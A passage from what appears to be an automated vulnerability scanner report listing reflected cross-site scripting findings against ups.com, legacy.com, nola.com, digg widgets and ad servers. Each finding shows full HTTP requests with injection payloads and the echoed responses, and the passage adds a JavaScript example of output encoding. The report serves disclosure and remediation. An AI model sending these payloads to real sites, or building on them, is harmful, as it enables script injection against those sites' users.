This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /imps.php?app=3452&ad_width=876&ad_height=200&img_pad=2&title_font=1&title_color=0066ccf56a6--><script>alert(1)</script>45d104bf298&description_font=1&description_color=000000&id=111&output=html HTTP/1.1
Host: web.adblade.com
Proxy-Connection: keep-alive
Referer: http://www.legacy.com/NS/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-806598134-1296072892362; __tuid=3911816417148998155; __esgs=G6LakLyNC66xftdQujJgAKhNo%2BVdJNvT4b1UxBBAJu4%3D; __sgs=zBgkd9JWM%2F7wEn91CzQUOJmrNvQIA6tPw07aWYGFqD8%3D

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.2.8
P3P: policyref="http://adblade.com/w3c/p3p.xml", CP="NOI DSP COR NID ADMa OPTa OUR NOR"
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Vendor: Adblade LLC | Adblade| http://www.adblade.com
Set-Cookie: __impt=1297646093.797656521573; expires=Tue, 15-Feb-2011 01:14:53 GMT; path=/
Content-type: text/html
Date: Mon, 14 Feb 2011 01:14:53 GMT
Server: lighttpd/1.4.18
Content-Length: 15511

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<meta http-equiv="content-type" content="text/html; ch
...[SNIP]...
nk, .adTitle1_111:visited, .adTitle1_111:hover,
.adLearnMoreLink1_111, .adLearnMoreLink1_111:link, .adLearnMoreLink1_111:visited, .adLearnMoreLink1_111:hover {
color:#0066ccf56a6--><script>alert(1)</script>45d104bf298; font-family:Arial,Helvetica,sans-serif; }
.adDescription1_111, .adDescription1_111:link, .adDescription1_111:visited, .adDescription1_111:hover {

...[SNIP]...

1.280. http://widgets.digg.com/buttons/count [url parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://widgets.digg.com
Path:   /buttons/count

Issue detail

The value of the url request parameter is copied into the HTML document as plain text between tags. The payload 27af1<script>alert(1)</script>8513e393b5a was submitted in the url parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /buttons/count?url=http%3A//www.cbsnews.com/8301-503544_162-20031629-503544.html27af1<script>alert(1)</script>8513e393b5a HTTP/1.1
Host: widgets.digg.com
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/8301-503544_162-20031629-503544.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Age: 0
Date: Mon, 14 Feb 2011 01:35:11 GMT
Via: NS-CACHE: 100
Etag: "f8541588bddf3eb1bbf54cd9fc665855a3fa6f8e"
Content-Length: 144
Server: TornadoServer/0.1
Content-Type: application/json
Accept-Ranges: bytes
Cache-Control: private, max-age=599
Expires: Mon, 14 Feb 2011 01:45:10 GMT
X-CDN: Cotendo
Connection: Keep-Alive

__DBW.collectDiggs({"url": "http://www.cbsnews.com/8301-503544_162-20031629-503544.html27af1<script>alert(1)</script>8513e393b5a", "diggs": 0});

1.281. http://www.dianomioffers.co.uk/smartads.epl [id parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.dianomioffers.co.uk
Path:   /smartads.epl

Issue detail

The value of the id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 198f9"><script>alert(1)</script>ddb3314bdd4 was submitted in the id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /smartads.epl?id=752198f9"><script>alert(1)</script>ddb3314bdd4 HTTP/1.1
Host: www.dianomioffers.co.uk
Proxy-Connection: keep-alive
Referer: http://uk.reuters.com/article/2011/02/13/us-bafta-idUKTRE71C1YB20110213
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:35:57 GMT
Server: Apache
Cache-Control: no-cache,no-store,private
Pragma: no-cache
Expires: now
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 4157


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title></title>
   <
...[SNIP]...
le.&amp;smartreferer=http%3A%2F%2Fuk%2Ereuters%2Ecom%2Farticle%2F2011%2F02%2F13%2Fus%2Dbafta%2DidUKTRE71C1YB20110213&amp;partner=1&amp;ad=176&amp;savid=478&amp;top_pid=1791&amp;tag=smartad&amp;said=752198f9"><script>alert(1)</script>ddb3314bdd4&amp;adv=&amp;psa=" >
...[SNIP]...

1.282. http://www.legacy.com/legacies/2011/obituary-photo-gallery.aspx [photo parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.legacy.com
Path:   /legacies/2011/obituary-photo-gallery.aspx

Issue detail

The value of the photo request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e96f0"style%3d"x%3aexpression(alert(1))"520eb12a7af was submitted in the photo parameter. This input was echoed as e96f0"style="x:expression(alert(1))"520eb12a7af in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /legacies/2011/obituary-photo-gallery.aspx?photo=betty-garrette96f0"style%3d"x%3aexpression(alert(1))"520eb12a7af&pid=148615818 HTTP/1.1
Host: www.legacy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=179553081.1297527408.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=179553081.1849741654.1297527408.1297527408.1297527408.1; UnicaNIODID=L1klHywCE1s-W0TKzur; ASP.NET_SessionId=eevpvg2f4ay2ys55kygehvjk; __qca=P0-2042163798-1297527399993;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:21:47 GMT
Server: Microsoft-IIS/6.0
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 44800


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   Betty Garret
...[SNIP]...
<link rel="canonical" href="http://www.legacy.com/legacies/2011/obituary-photo-gallery.aspx?photo=betty-garrette96f0"style="x:expression(alert(1))"520eb12a7af&pid=148615818"/>
...[SNIP]...

1.283. http://www.nola.com/cgi-bin/donotcount/formatp.cgi/dhtml/jspop/jspop.ata [EXP parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nola.com
Path:   /cgi-bin/donotcount/formatp.cgi/dhtml/jspop/jspop.ata

Issue detail

The value of the EXP request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 65478%3balert(1)//a1064b052ee was submitted in the EXP parameter. This input was echoed as 65478;alert(1)//a1064b052ee in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cgi-bin/donotcount/formatp.cgi/dhtml/jspop/jspop.ata?NAME=POPUNDER&EXP=165478%3balert(1)//a1064b052ee HTTP/1.1
Host: www.nola.com
Proxy-Connection: keep-alive
Referer: http://www.nola.com/crime/index.ssf/2011/02/new_orleans_pizza_delivery_man.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW801Yhs4ACnY4

Response

HTTP/1.1 200 OK
Server: Apache
P3P: CP='CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi SAMo OTRo BUS IND PHY ONL UNI COM NAV INT DEM'
ntCoent-Length: 959
Content-Type: text/plain; charset=UTF-8
Vary: Accept-Encoding
Cache-Control: max-age=1
Expires: Mon, 14 Feb 2011 01:36:23 GMT
Date: Mon, 14 Feb 2011 01:36:22 GMT
Connection: close
Content-Length: 959

function Cookie(id, value, days) {
var expiration = new Date();
expiration.setTime(expiration.getTime() + (days*86400000));
document.cookie = id + "=" + value +
        "; expires=" + expiration.toGMTStr
...[SNIP]...
rease number of user visits by one
if (page_views >= 1) {
   page_views++;
}
else {
// or set page view to one
   page_views = 1;
}


// set or update cookie
var work = new Cookie("POPUNDER", page_views, 165478;alert(1)//a1064b052ee);



1.284. http://www.nola.com/cgi-bin/donotcount/formatp.cgi/dhtml/jspop/jspop.ata [NAME parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nola.com
Path:   /cgi-bin/donotcount/formatp.cgi/dhtml/jspop/jspop.ata

Issue detail

The value of the NAME request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 82da5"%3balert(1)//506e845993d was submitted in the NAME parameter. This input was echoed as 82da5";alert(1)//506e845993d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cgi-bin/donotcount/formatp.cgi/dhtml/jspop/jspop.ata?NAME=POPUNDER82da5"%3balert(1)//506e845993d&EXP=1 HTTP/1.1
Host: www.nola.com
Proxy-Connection: keep-alive
Referer: http://www.nola.com/crime/index.ssf/2011/02/new_orleans_pizza_delivery_man.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW801Yhs4ACnY4

Response

HTTP/1.1 200 OK
Server: Apache
P3P: CP='CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi SAMo OTRo BUS IND PHY ONL UNI COM NAV INT DEM'
Content-Type: text/plain; charset=UTF-8
Vary: Accept-Encoding
Cache-Control: max-age=1
Expires: Mon, 14 Feb 2011 01:36:23 GMT
Date: Mon, 14 Feb 2011 01:36:22 GMT
Connection: close
Content-Length: 988

function Cookie(id, value, days) {
var expiration = new Date();
expiration.setTime(expiration.getTime() + (days*86400000));
document.cookie = id + "=" + value +
        "; expires=" + expiration.toGMTString() + ";domain=.nola.com;path=/;";
}

var allcookies = document.cookie;

// Check for this exact cookie
// in case there are more than one on this page

var id = "POPUNDER82da5";alert(1)//506e845993d";

var start = allcookies.indexOf(id + "=");

// if cookie exists substring the number of user visits from the value string
if (start != -1) {
start += id.length +1;
var end = allcookies.indexOf(";",
...[SNIP]...

1.285. http://www.ups.com/bussol [WT.svl parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /bussol

Issue detail

The value of the WT.svl request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5b8d1"style%3d"x%3aexpression(alert(1))"f4e955ab522 was submitted in the WT.svl parameter. This input was echoed as 5b8d1"style="x:expression(alert(1))"f4e955ab522 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /bussol?loc=en_US&WT.svl=PriNav5b8d1"style%3d"x%3aexpression(alert(1))"f4e955ab522 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:38 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Set-Cookie: com.ups.bussol.data=GJq1NYGSyJt6JdGvfWmChTLqL4mM8L6MNmYnGczyNNgN81gH90Bh!-874049020!-1727860139!15202!-1; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17883


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="hidden" id="unKnown"
   value="&WT.svl=PriNav5b8d1"style="x:expression(alert(1))"f4e955ab522&loc=en_US" />
...[SNIP]...

1.286. http://www.ups.com/bussol [actionID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /bussol

Issue detail

The value of the actionID request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 82a1a"style%3d"x%3aexpression(alert(1))"0a64840504b was submitted in the actionID parameter. This input was echoed as 82a1a"style="x:expression(alert(1))"0a64840504b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /bussol?loc=en_US&viewID=productView&contentID=ct1_sol_sol_int_ship&actionID=videoDemo82a1a"style%3d"x%3aexpression(alert(1))"0a64840504b HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:49 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Set-Cookie: com.ups.bussol.data=vG56NYGdQ5B2RJl7qh78jHpwwn9S1MV1h7C7HmynpjtF7QnySHrQ!813271666!-1727860140!15201!-1; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18141


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="hidden" id="bspa_actionID"
   value="videoDemo82a1a"style="x:expression(alert(1))"0a64840504b" />
...[SNIP]...

1.287. http://www.ups.com/bussol [actionID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /bussol

Issue detail

The value of the actionID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5c518"%3balert(1)//e6dfe32ce27 was submitted in the actionID parameter. This input was echoed as 5c518";alert(1)//e6dfe32ce27 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bussol?loc=en_US&viewID=productView&contentID=ct1_sol_sol_int_ship&actionID=videoDemo5c518"%3balert(1)//e6dfe32ce27 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:50 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Set-Cookie: com.ups.bussol.data=pfl9NYGpRJ3bMG8jFM0yWChjmFpqfrrMrWGLp4snQtvC3TqTs6nF!-874049020!-1727860139!15202!-1; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18084


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
           "name", "bussol",
           "allowScriptAccess","sameDomain",
           "type", "application/x-shockwave-flash",
           "pluginspage", "http://www.adobe.com/go/getflashplayer",
           "FlashVars", "actionID=videoDemo5c518";alert(1)//e6dfe32ce27&bspa_xmlRoot=/xml/ria/na/us/en/bussol/&contentID=ct1_sol_sol_int_ship&hash=1297646750072&loc=en_US&v=2.0.4&viewID=productView"
   );
} else { // flash is too old or we can't detect the plugin
   docum
...[SNIP]...

1.288. http://www.ups.com/bussol [contentID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /bussol

Issue detail

The value of the contentID request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b611e"style%3d"x%3aexpression(alert(1))"ed7c494a92e was submitted in the contentID parameter. This input was echoed as b611e"style="x:expression(alert(1))"ed7c494a92e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /bussol?loc=en_US&viewID=productView&contentID=ct1_sol_sol_int_shipb611e"style%3d"x%3aexpression(alert(1))"ed7c494a92e&actionID=videoDemo HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:46 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Set-Cookie: com.ups.bussol.data=gLGfNYGh1ll4WyP7f1Tpp4QnQqhjxhJcszfLYXrwGrTqNnnQTvK3!-874049020!-1727860139!15202!-1; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18141


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="hidden" id="bspa_contentID"
   value="ct1_sol_sol_int_shipb611e"style="x:expression(alert(1))"ed7c494a92e" />
...[SNIP]...

1.289. http://www.ups.com/bussol [contentID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /bussol

Issue detail

The value of the contentID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 400cb"%3balert(1)//b2edff9e689 was submitted in the contentID parameter. This input was echoed as 400cb";alert(1)//b2edff9e689 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bussol?loc=en_US&viewID=productView&contentID=ct1_sol_sol_int_ship400cb"%3balert(1)//b2edff9e689&actionID=videoDemo HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:47 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Set-Cookie: com.ups.bussol.data=83XvNYGb1b1Q810cT9c3B7yvfQTw2h92pNzmJzZT72QYZ4Zf74fs!-874049020!-1727860139!15202!-1; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18084


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
"application/x-shockwave-flash",
           "pluginspage", "http://www.adobe.com/go/getflashplayer",
           "FlashVars", "actionID=videoDemo&bspa_xmlRoot=/xml/ria/na/us/en/bussol/&contentID=ct1_sol_sol_int_ship400cb";alert(1)//b2edff9e689&hash=1297646747167&loc=en_US&v=2.0.4&viewID=productView"
   );
} else { // flash is too old or we can't detect the plugin
   document.getElementById("noflashdiv").style.display = "block";
}
</script
...[SNIP]...
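
The two sinks seen so far on this host, the hidden input whose value attribute echoes the parameter (as in the contentID attribute finding above) and the FlashVars string literal inside the script block in 1.289, land in different output contexts and need different encoders; stripping script tags or blocking a few characters would fix neither. The following is an added example, not code from the scanner report or from the scanned application. The render functions and the embed() call are hypothetical stand-ins for the site's JSP templates; the two payloads are the ones the report shows being echoed.

```javascript
// Added example: not code from the scanner report or from the scanned site.
// The findings show two reflection contexts: a hidden <input value="..."> and a
// double-quoted string literal inside a <script> block. Each needs its own
// encoder. The render*() functions are hypothetical stand-ins for the site's
// JSP templates; the two payloads are the ones the report shows being echoed.

const HTML_ATTR_ENTITIES = { "&": "&amp;", '"': "&quot;", "'": "&#39;", "<": "&lt;", ">": "&gt;" };
const HTML_ATTR_DECODE = Object.fromEntries(
  Object.entries(HTML_ATTR_ENTITIES).map(([ch, ent]) => [ent, ch]));

// HTML attribute context: entity-encode the characters that can end a quoted
// attribute value or start new markup.
function encodeHtmlAttr(s) {
  return String(s).replace(/[&"'<>]/g, (c) => HTML_ATTR_ENTITIES[c]);
}

function decodeHtmlAttr(s) {
  return s.replace(/&(?:amp|quot|#39|lt|gt);/g, (ent) => HTML_ATTR_DECODE[ent]);
}

// JavaScript string-literal context: \uXXXX-escape everything outside a short
// allow-list, so a quote, a // comment, a line terminator or </script> can
// never reach the script parser as syntax.
function encodeJsString(s) {
  return String(s).replace(/[^A-Za-z0-9_.\-]/g,
    (c) => "\\u" + c.charCodeAt(0).toString(16).padStart(4, "0"));
}

// Sink 1: hidden input, the shape of findings 1.291 and 1.292.
function renderHiddenInputVuln(id, value) {
  return `<input type="hidden" id="${id}"\n   value="${value}" />`;
}
function renderHiddenInput(id, value) {
  return `<input type="hidden" id="${encodeHtmlAttr(id)}"\n   value="${encodeHtmlAttr(value)}" />`;
}

// Reads the value attribute back the way an HTML parser does: the first
// unescaped double quote ends it.
function readValueAttr(html) {
  const m = /value="([^"]*)"/.exec(html);
  return m ? decodeHtmlAttr(m[1]) : null;
}

// True when a style= attribute exists that the template never wrote.
function hasInjectedStyleAttr(html) {
  return /(^|[\s"])style=/.test(html);
}

// Sink 2: FlashVars string literal inside <script>, the shape of finding 1.289.
// embed() stands in for the page's Flash-embedding call.
function renderFlashVarsVuln(params) {
  const qs = Object.entries(params).map(([k, v]) => `${k}=${v}`).join("&");
  return `embed(\n  "FlashVars", "${qs}"\n);`;
}
function renderFlashVars(params) {
  // FlashVars is itself a URL-encoded query string: encode each part for that
  // format first, then escape the whole literal for the JavaScript context.
  const qs = Object.entries(params)
    .map(([k, v]) => `${encodeURIComponent(k)}=${encodeURIComponent(v)}`)
    .join("&");
  return `embed(\n  "FlashVars", "${encodeJsString(qs)}"\n);`;
}

// False when the injected text broke the script's syntax.
function scriptParses(src) {
  try { new Function("embed", src); return true; }
  catch (e) { if (e instanceof SyntaxError) return false; throw e; }
}

// Runs the generated script with a stub embed() and returns the contentID the
// Flash movie would actually receive.
function contentIdSeenByFlash(src) {
  let flashVars = null;
  new Function("embed", src)((name, value) => { flashVars = value; });
  return new URLSearchParams(flashVars).get("contentID");
}

// The report's own echoed payloads (random scanner prefix/suffix included).
const ATTR_PAYLOAD = 'ct1_sol_sol_int_shipb611e"style="x:expression(alert(1))"ed7c494a92e';
const JS_PAYLOAD = 'ct1_sol_sol_int_ship400cb";alert(1)//b2edff9e689';

function demo() {
  const vulnHtml = renderHiddenInputVuln("bspa_contentID", ATTR_PAYLOAD);
  const safeHtml = renderHiddenInput("bspa_contentID", ATTR_PAYLOAD);
  const params = { actionID: "videoDemo", contentID: JS_PAYLOAD, loc: "en_US" };
  const vulnJs = renderFlashVarsVuln(params);
  const safeJs = renderFlashVars(params);
  return {
    vulnAttrValue: readValueAttr(vulnHtml),       // truncated at the injected quote
    vulnHasStyle: hasInjectedStyleAttr(vulnHtml), // true: a new attribute appeared
    safeAttrValue: readValueAttr(safeHtml),       // round-trips unchanged
    safeHasStyle: hasInjectedStyleAttr(safeHtml), // false
    vulnJsParses: scriptParses(vulnJs),           // false: '";' splits the call
    safeContentId: contentIdSeenByFlash(safeJs),  // round-trips unchanged
  };
}

console.log(demo());
```

Running it shows the vulnerable value attribute truncated at the injected quote with a fresh style attribute after it, while the encoded version round-trips the whole string as one attribute value. For the script sink it also shows a caveat worth keeping in mind when reading the string-context findings: the ";alert(1)// payload, echoed exactly as in 1.289, leaves the surrounding call open (its closing ); sits on the next line, as the snippet shows), so the script block as reflected does not parse at all. The scanner's Certain confidence rests on the double quote surviving unencoded, which is the defect; it does not mean the PoC was observed executing.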

1.290. http://www.ups.com/bussol [loc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /bussol

Issue detail

The value of the loc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 447f7"%3balert(1)//99f06ff3db6 was submitted in the loc parameter. This input was echoed as 447f7";alert(1)//99f06ff3db6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bussol?loc=en_US447f7"%3balert(1)//99f06ff3db6&WT.svl=PriNav HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:37 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Set-Cookie: com.ups.bussol.data=2PvYNYGRRBhwJYyp24HblqFn9bTTQTC64XDGXYWs2YQyywJx17pG!813271666!-1727860140!15201!-1; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17948


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
eDomain",
           "type", "application/x-shockwave-flash",
           "pluginspage", "http://www.adobe.com/go/getflashplayer",
           "FlashVars", "bspa_xmlRoot=/xml/ria/na/us/en/bussol/&hash=1297646737274&loc=en_US447f7";alert(1)//99f06ff3db6&v=2.0.4"
   );
} else { // flash is too old or we can't detect the plugin
   document.getElementById("noflashdiv").style.display = "block";
}
</script>
...[SNIP]...

1.291. http://www.ups.com/bussol [loc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /bussol

Issue detail

The value of the loc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c4508"style%3d"x%3aexpression(alert(1))"db0ed3f5143 was submitted in the loc parameter. This input was echoed as c4508"style="x:expression(alert(1))"db0ed3f5143 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated CSS expression in an injected style attribute to introduce arbitrary JavaScript into the document. Note that CSS expressions are specific to older versions and rendering modes of Internet Explorer, so this exact payload may not fire in other browsers; the underlying defect, an unencoded double quote that terminates the attribute value, is browser-independent.

Request

GET /bussol?loc=en_USc4508"style%3d"x%3aexpression(alert(1))"db0ed3f5143&WT.svl=PriNav HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:36 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
